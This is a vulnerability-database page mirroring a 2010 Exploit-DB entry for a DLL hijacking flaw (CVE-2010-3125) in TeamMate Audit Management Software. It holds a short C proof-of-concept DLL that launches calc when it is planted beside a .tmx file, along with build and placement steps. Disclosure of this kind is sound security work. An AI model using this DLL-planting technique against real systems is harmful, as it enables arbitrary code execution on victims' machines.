Lucene search
+L

TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by Beenu AroraType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

TeamMate Audit Management Software Suite DLL Hijacking vulnerability, Windows XP SP3, tmx extensio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-3125
26 Aug 201018:00
cve
cvelist
Cvelist
CVE-2010-3125
26 Aug 201018:00
cvelist
euvd
EUVD
EUVD-2010-3125
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3125
26 Aug 201018:36
nvd
prion
Prion
Design/Logic Flaw
26 Aug 201018:36
prion
redhatcve
RedhatCVE
CVE-2010-3125
22 May 202504:17
redhatcve
/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban ,Ganesha, Dinesh Arora
# Site : www.beenuarora.com

Exploit Title: TeamMate Audit Management Software Suite DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , TeamMate Audit Management Software Suite v8.0
patch 2
Vulnerable extensions: tmx

Compile and rename to mfc71enu.dll, create a file in the same dir with one
of the following extensions:
.tmx
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14747.zip

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.05808
24